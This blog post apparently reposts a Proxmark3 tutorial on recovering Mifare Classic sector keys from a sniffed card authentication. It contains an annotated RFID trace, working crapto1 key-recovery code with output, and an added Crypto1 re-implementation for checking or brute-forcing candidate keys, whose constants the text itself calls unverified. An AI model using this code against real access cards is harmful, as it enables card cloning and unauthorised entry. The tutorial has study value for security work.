Thursday, 28 February 2013

Getting the sector key of a mifare card

Author : xfpga Date : 2012-12-12 12:28:59

Getting the sector key of a Mifare card (taken from the Proxmark3 project's Google Code pages)

Snooping on Mifare communications

This is a working example of how the sector keys of Mifare Classic cards can be retrieved with a Proxmark3, using the "crapto1" package found on Google Code. The attack needs only a passive recording of one successful authentication between a legitimate reader and the card: the key is never sent, but the 64 bits of keystream that can be reconstructed from the exchange are enough to roll the Crypto1 cipher back to its initial state, which is the key.
The trace below is taken from a hi14asnoop session (hf 14a snoop in newer clients) followed by hf 14a list, and shows the beginning of the authentication and encryption protocol:

Each trace line reads: + time since the previous frame (timer ticks) : byte count : bytes. Frames sent by the card are prefixed with TAG. A "!" after a byte marks a parity error: Crypto1 encrypts the parity bits as well, so from the encrypted reader nonce onward every byte shows one, which is a convenient marker for where the encrypted part of the exchange begins.

Command                                       Comment
+ 561882 : 1 : 26                             REQA
+ 64 : 2 : TAG 04 00                          ATQA (answer to REQA)
+ 10217 : 2 : 93 20                           SELECT / anticollision
+ 64 : 5 : TAG 9c 59 9b 32 6c                 The card's UID is therefore 9c 59 9b 32 (6c is the BCC, the XOR of the four UID bytes)
+ 12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30      SELECT with UID (6b 30 is the CRC)
+ 64 : 3 : TAG 08 b6 dd                       SAK 08: tag type Mifare Classic 1K (b6 dd is the CRC)
+ 923318 : 4 : 60 00 f5 7b                    AUTH with key A (0x60) of block 00 (f5 7b is the CRC)
+ 112 : 4 : TAG 82 a4 16 6c                   Tag challenge (nt, "Nonce Tag"), sent in clear
+ 6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 !  nr XOR ks1 (Nonce Reader, encrypted, 4 bytes), then
                                              ar XOR ks2 (Answer Reader to Nonce Tag, encrypted, 4 bytes)
+ 64 : 4 : TAG 5c ! ad f4 39 !                at XOR ks3 (Answer Tag, encrypted)

In order to extract the key for sector 0 from the exchange, we need the following elements:
  • Tag UID
  • Tag challenge (nt), which is sent in clear
  • Reader challenge, encrypted (nr XOR ks1; only this encrypted form is ever on the air, and it is the value called nr below)
  • Reader response, encrypted (ar XOR ks2, called ar below)
  • Tag response, encrypted (at XOR ks3, called at below)
In the example above:
  • UID : 0x9c599b32
  • nt : 0x82a4166c
  • nr : 0xa1e458ce
  • ar : 0x6eea41e0
  • at : 0x5cadf439
The plaintexts behind ar and at are known: a reader that holds the key answers with ar = suc2(nt) and the card with at = suc3(nt), where suc2 and suc3 are nt advanced 64 and 96 steps through the card's 16-bit nonce PRNG. XORing them out of the sniffed values yields ks2 and ks3, 64 bits of keystream, which is what crapto1 needs. Those values can then be used in the following "crapto1" test program:
// Test-file: test2.c
// Written against the crapto1 1.0 API used on the Proxmark3 pages; in later
// crapto1 releases lfsr_recovery() became lfsr_recovery64() and
// lfsr_rollback() became lfsr_rollback_word().
#include "crapto1.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	struct Crypto1State *revstate;
	uint64_t lfsr;

	/* Values from the sniffed trace above, as big-endian 32-bit words. */
	uint32_t uid             = 0x9c599b32;
	uint32_t tag_challenge   = 0x82a4166c;  /* nt */
	uint32_t nr_enc          = 0xa1e458ce;  /* nr XOR ks1 */
	uint32_t reader_response = 0x6eea41e0;  /* ar XOR ks2, ar = suc2(nt) */
	uint32_t tag_response    = 0x5cadf439;  /* at XOR ks3, at = suc3(nt) */

	/* Strip the known plaintexts to obtain 64 bits of keystream. */
	uint32_t ks2 = reader_response ^ prng_successor(tag_challenge, 64);
	uint32_t ks3 = tag_response    ^ prng_successor(tag_challenge, 96);

	printf("nt': %08x\n",  prng_successor(tag_challenge, 64));
	printf("nt'': %08x\n", prng_successor(tag_challenge, 96));
	printf("ks2: %08x\n", ks2);
	printf("ks3: %08x\n", ks3);

	/* Recover the cipher state that produced ks2 followed by ks3. The result
	 * is a zero-terminated list of candidate states; 64 bits of keystream
	 * normally leave exactly one, so only the first entry is used. */
	revstate = lfsr_recovery(ks2, ks3);
	if (revstate == NULL || (revstate->odd == 0 && revstate->even == 0)) {
		fprintf(stderr, "no candidate state found\n");
		free(revstate);
		return 1;
	}

	/* Roll the LFSR back to its initial state, undoing the inputs in reverse
	 * order: the two keystream words (no input), the reader nonce (fed in its
	 * encrypted form, hence the last argument 1) and finally uid XOR nt, which
	 * both sides feed in clear. */
	lfsr_rollback(revstate, 0, 0);                    /* ks3 */
	lfsr_rollback(revstate, 0, 0);                    /* ks2 */
	lfsr_rollback(revstate, nr_enc, 1);               /* nr XOR ks1 */
	lfsr_rollback(revstate, uid ^ tag_challenge, 0);  /* uid XOR nt */

	/* The initial state is the 48-bit sector key. Print it most significant
	 * byte first, which is the order the Proxmark client takes keys in
	 * (reading the uint64_t through a char pointer would reverse the bytes
	 * on a little-endian host; harmless only for a key such as ff..ff). */
	crypto1_get_lfsr(revstate, &lfsr);
	printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",
	       (unsigned)(lfsr >> 40) & 0xff, (unsigned)(lfsr >> 32) & 0xff,
	       (unsigned)(lfsr >> 24) & 0xff, (unsigned)(lfsr >> 16) & 0xff,
	       (unsigned)(lfsr >>  8) & 0xff, (unsigned)(lfsr      ) & 0xff);

	free(revstate);
	return 0;
}
Then compiled with (crapto1.c and crypto1.c are part of the crapto1 package):
#gcc -o test2 test2.c crapto1.c crypto1.c
And run like this:
./test2
nt': 8d65734b
nt'': 9a427b20
ks2: e38f32ab
ks3: c6ef8f19
Found Key: [ff ff ff ff ff ff]


You can also use the GUI software to do this; the result is the same.
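The following C program is an added example, not code from the page or from the crapto1 package. It re-implements the Crypto1 cipher and the 16-bit nonce PRNG following the crapto1 reference code (the filter, feedback polynomials and bit ordering are copied from memory of that code and are an assumption here), and then replays the sniffed sector-0 authentication from both sides with a candidate key: it decrypts {nr} the way the card does, derives ks2 and ks3, and rebuilds {ar} and {at}. That makes it the check a practitioner wants after recovery (mfkey64-style tools do the same internally): a key that reproduces the sniffed {ar} and {at} is the real one, and the "two rollbacks with no input, then nr, then uid XOR nt" order in test2.c is simply this sequence run backwards. The names c1_*, replay_auth and key_matches_trace are this example's own.

```c
#include <stdint.h>
#include <stdio.h>

/* Crypto1 state: the 48-bit LFSR split into odd and even bit halves, as in crapto1. */
struct c1_state { uint32_t odd, even; };

#define BIT(x, n)    (((x) >> (n)) & 1)
#define BEBIT(x, n)  BIT(x, (n) ^ 24)   /* bytes MSB-first, bits inside a byte LSB-first */
#define LF_POLY_ODD  0x29CE5C           /* feedback taps of the odd half */
#define LF_POLY_EVEN 0x870804           /* feedback taps of the even half */

int c1_parity(uint32_t x)
{
    x ^= x >> 16; x ^= x >> 8; x ^= x >> 4;
    return BIT(0x6996, x & 0xf);
}

/* Two-layer non-linear filter over 20 bits of the odd half: one keystream bit. */
int c1_filter(uint32_t x)
{
    uint32_t f;
    f  = (0xf22c0 >> (x       & 0xf)) & 16;
    f |= (0x6c9c0 >> (x >>  4 & 0xf)) &  8;
    f |= (0x3c8b0 >> (x >>  8 & 0xf)) &  4;
    f |= (0x1e458 >> (x >> 12 & 0xf)) &  2;
    f |= (0x0d938 >> (x >> 16 & 0xf)) &  1;
    return BIT(0xEC57E80A, f);
}

/* Load a 48-bit sector key into the LFSR. */
void c1_init(struct c1_state *s, uint64_t key)
{
    s->odd = s->even = 0;
    for (int i = 47; i > 0; i -= 2) {
        s->odd  = (s->odd  << 1) | BIT(key, (i - 1) ^ 7);
        s->even = (s->even << 1) | BIT(key, i ^ 7);
    }
}

/* Clock the cipher once. The input bit is mixed into the feedback; when it is
 * ciphertext (is_encrypted), the keystream bit is stripped first, which is how
 * the card absorbs the reader's encrypted nonce. Returns the keystream bit. */
int c1_bit(struct c1_state *s, int in, int is_encrypted)
{
    uint32_t feedin, t;
    int ks = c1_filter(s->odd);
    feedin  = ks & !!is_encrypted;
    feedin ^= !!in;
    feedin ^= LF_POLY_ODD & s->odd;
    feedin ^= LF_POLY_EVEN & s->even;
    s->even = (s->even << 1) | c1_parity(feedin);
    t = s->odd; s->odd = s->even; s->even = t;
    return ks;
}

uint32_t c1_word(struct c1_state *s, uint32_t in, int is_encrypted)
{
    uint32_t ks = 0;
    for (int i = 0; i < 32; i++)
        ks |= (uint32_t)c1_bit(s, BEBIT(in, i), is_encrypted) << (i ^ 24);
    return ks;
}

uint32_t c1_bswap32(uint32_t x)
{
    x = ((x >> 8) & 0xff00ff) | ((x & 0xff00ff) << 8);
    return (x >> 16) | (x << 16);
}

/* Mifare Classic nonce PRNG: 16-bit LFSR x^16+x^14+x^13+x^11+1 stepped n times;
 * suc2(nt) = prng_successor(nt, 64), suc3(nt) = prng_successor(nt, 96). */
uint32_t prng_successor(uint32_t x, unsigned n)
{
    x = c1_bswap32(x);
    while (n--)
        x = (x >> 1) | ((x >> 16 ^ x >> 18 ^ x >> 19 ^ x >> 21) << 31);
    return c1_bswap32(x);
}

struct auth_replay { uint32_t nr, ks1, ks2, ks3, ar_enc, at_enc; };

/* Replay the sniffed authentication with a candidate key; this is the order
 * test2.c rolls back, run forwards. */
struct auth_replay replay_auth(uint64_t key, uint32_t uid, uint32_t nt, uint32_t nr_enc)
{
    struct c1_state s;
    struct auth_replay r;
    c1_init(&s, key);
    c1_word(&s, uid ^ nt, 0);                     /* both sides feed uid XOR nt in clear */
    r.ks1 = c1_word(&s, nr_enc, 1);               /* card side: decrypt {nr}, feeding nr back */
    r.nr  = nr_enc ^ r.ks1;
    r.ks2 = c1_word(&s, 0, 0);                    /* keystream for the reader answer */
    r.ks3 = c1_word(&s, 0, 0);                    /* keystream for the tag answer */
    r.ar_enc = prng_successor(nt, 64) ^ r.ks2;    /* {ar} = suc2(nt) XOR ks2 */
    r.at_enc = prng_successor(nt, 96) ^ r.ks3;    /* {at} = suc3(nt) XOR ks3 */
    return r;
}

/* Key check: does this key reproduce the sniffed {ar} and {at}? */
int key_matches_trace(uint64_t key, uint32_t uid, uint32_t nt, uint32_t nr_enc,
                      uint32_t ar_enc, uint32_t at_enc)
{
    struct auth_replay r = replay_auth(key, uid, nt, nr_enc);
    return r.ar_enc == ar_enc && r.at_enc == at_enc;
}

int main(void)
{
    /* Values from the trace on this page and the key test2.c recovered. */
    uint32_t uid = 0x9c599b32, nt = 0x82a4166c, nr_enc = 0xa1e458ce;
    uint32_t ar_enc = 0x6eea41e0, at_enc = 0x5cadf439;
    uint64_t key = 0xffffffffffffULL;
    struct auth_replay r = replay_auth(key, uid, nt, nr_enc);
    printf("nr (decrypted): %08x  ks2: %08x  ks3: %08x\n", r.nr, r.ks2, r.ks3);
    printf("key %012llx %s the sniffed exchange\n", (unsigned long long)key,
           key_matches_trace(key, uid, nt, nr_enc, ar_enc, at_enc) ? "reproduces" : "does NOT reproduce");
    return 0;
}
```

Compile with gcc -std=c99 -o replay replay.c and run it without arguments; with the page's trace and key ff ff ff ff ff ff the ks2 and ks3 it derives are the e38f32ab and c6ef8f19 printed by test2.c, and a wrong key (for instance the common default a0a1a2a3a4a5) fails the check. The same replay_auth is also what a brute-force over a key dictionary would call per candidate when only one trace is available.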
